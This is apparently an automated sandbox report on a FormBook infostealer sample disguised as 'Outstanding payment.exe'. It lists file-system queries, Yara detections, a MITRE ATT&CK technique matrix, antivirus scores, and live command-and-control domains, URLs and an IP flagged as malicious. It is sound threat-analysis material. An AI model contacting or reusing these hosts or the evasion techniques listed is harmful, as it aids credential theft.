Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Queries volume information: C:\Users\user\AppData\Roaming\iBSWjb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Outstanding payment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	712 Process Injection	1 Masquerading	OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	712 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 System Network Connections Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	212 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Outstanding payment.exe	29%	ReversingLabs
Outstanding payment.exe	36%	Virustotal		Browse
Outstanding payment.exe	100%	Avira	HEUR/AGEN.1310400
Outstanding payment.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\iBSWjb.exe	100%	Avira	HEUR/AGEN.1310400
C:\Users\user\AppData\Roaming\iBSWjb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\iBSWjb.exe	29%	ReversingLabs

Source	Detection	Scanner	Label
http://www.istromarmitaria.online	0%	Avira URL Cloud	safe
http://www.dj1.lat/a03d/	100%	Avira URL Cloud	malware
http://www.istromarmitaria.online/a03d/	100%	Avira URL Cloud	malware
http://www.8oosnny.xyzReferer:	0%	Avira URL Cloud	safe
http://www.8oosnny.xyz	0%	Avira URL Cloud	safe
http://www.otelhafnia.infoReferer:	0%	Avira URL Cloud	safe
www.enelog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.otelhafnia.info/a03d/www.kkkk.shop	100%	Avira URL Cloud	malware
http://www.istromarmitaria.online/a03d/www.dj1.lat	100%	Avira URL Cloud	malware
http://www.nfluencer-marketing-13524.bond/a03d/www.atidiri.fun	100%	Avira URL Cloud	malware
http://www.72266.vip/a03d/www.istromarmitaria.online	100%	Avira URL Cloud	malware
http://www.aja168e.liveReferer:	0%	Avira URL Cloud	safe
http://www.enelog.xyzReferer:	0%	Avira URL Cloud	safe
http://www.nfluencer-marketing-13524.bond/a03d/	100%	Avira URL Cloud	malware
http://www.atidiri.funReferer:	0%	Avira URL Cloud	safe
http://www.oftware-download-92806.bond	0%	Avira URL Cloud	safe
http://www.duxrib.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.dj1.lat/a03d/j	100%	Avira URL Cloud	malware
http://www.lphatechblog.xyzReferer:	0%	Avira URL Cloud	safe
http://www.aja168e.live/a03d/www.duxrib.xyz	100%	Avira URL Cloud	malware
http://www.enelog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.atidiri.fun/a03d/	100%	Avira URL Cloud	malware
http://www.otelhafnia.info/a03d/	100%	Avira URL Cloud	malware
http://www.72266.vip	0%	Avira URL Cloud	safe
http://www.behm.infoReferer:	0%	Avira URL Cloud	safe
http://www.kkkk.shop/a03d/www.aja168e.live	100%	Avira URL Cloud	malware
http://www.lphatechblog.xyz	0%	Avira URL Cloud	safe
http://www.72266.vipReferer:	0%	Avira URL Cloud	safe
http://www.otelhafnia.info	0%	Avira URL Cloud	safe
http://www.oftware-download-92806.bond/a03d/	100%	Avira URL Cloud	malware
http://www.nfluencer-marketing-13524.bondReferer:	0%	Avira URL Cloud	safe
http://www.dj1.latReferer:	0%	Avira URL Cloud	safe
http://www.aja168e.live	0%	Avira URL Cloud	safe
http://www.atidiri.fun/a03d/www.otelhafnia.info	100%	Avira URL Cloud	malware
http://www.inggraphic.pro/a03d/	100%	Avira URL Cloud	malware
http://www.behm.info/a03d/	100%	Avira URL Cloud	malware
http://www.atidiri.fun	0%	Avira URL Cloud	safe
http://www.kkkk.shop	100%	Avira URL Cloud	malware
http://www.elnqdjc.shop/a03d/www.8oosnny.xyz	100%	Avira URL Cloud	malware
http://www.72266.vip/a03d/	100%	Avira URL Cloud	malware
http://www.inggraphic.proReferer:	0%	Avira URL Cloud	safe
http://www.behm.info/a03d/www.enelog.xyz	100%	Avira URL Cloud	malware
http://www.lphatechblog.xyz/a03d/www.oftware-download-92806.bond	100%	Avira URL Cloud	malware
http://www.inggraphic.pro	0%	Avira URL Cloud	safe
http://www.8oosnny.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.elnqdjc.shop/a03d/	100%	Avira URL Cloud	malware
http://www.enelog.xyz	0%	Avira URL Cloud	safe
http://www.lphatechblog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.dj1.lat	0%	Avira URL Cloud	safe
http://www.behm.info	0%	Avira URL Cloud	safe
http://www.enelog.xyz/a03d/www.72266.vip	100%	Avira URL Cloud	malware
http://www.inggraphic.pro/a03d/www.elnqdjc.shop	100%	Avira URL Cloud	malware
http://www.aja168e.live/a03d/	100%	Avira URL Cloud	malware
http://www.istromarmitaria.onlineReferer:	0%	Avira URL Cloud	safe
http://www.oftware-download-92806.bond/a03d/www.behm.info	100%	Avira URL Cloud	malware
http://www.duxrib.xyz/a03d/www.lphatechblog.xyz	100%	Avira URL Cloud	malware
http://www.elnqdjc.shopReferer:	0%	Avira URL Cloud	safe
http://www.8oosnny.xyz/a03d/www.nfluencer-marketing-13524.bond	100%	Avira URL Cloud	malware
http://www.elnqdjc.shop	0%	Avira URL Cloud	safe
http://www.kkkk.shop/a03d/	100%	Avira URL Cloud	malware
http://www.oftware-download-92806.bondReferer:	0%	Avira URL Cloud	safe
http://www.nfluencer-marketing-13524.bond	0%	Avira URL Cloud	safe
http://www.kkkk.shopReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.kkkk.shop	121.254.178.252	true	true	unknown
www.oftware-download-92806.bond	unknown	unknown	true	unknown
www.inggraphic.pro	unknown	unknown	true	unknown
www.elnqdjc.shop	unknown	unknown	true	unknown
www.otelhafnia.info	unknown	unknown	true	unknown
www.behm.info	unknown	unknown	true	unknown
www.aja168e.live	unknown	unknown	true	unknown
www.atidiri.fun	unknown	unknown	true	unknown
www.8oosnny.xyz	unknown	unknown	true	unknown
www.nfluencer-marketing-13524.bond	unknown	unknown	true	unknown
www.lphatechblog.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.enelog.xyz/a03d/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 0000000A.00000002.4534821677.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dj1.lat/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.istromarmitaria.online/a03d/	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.8oosnny.xyz	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.istromarmitaria.online	explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
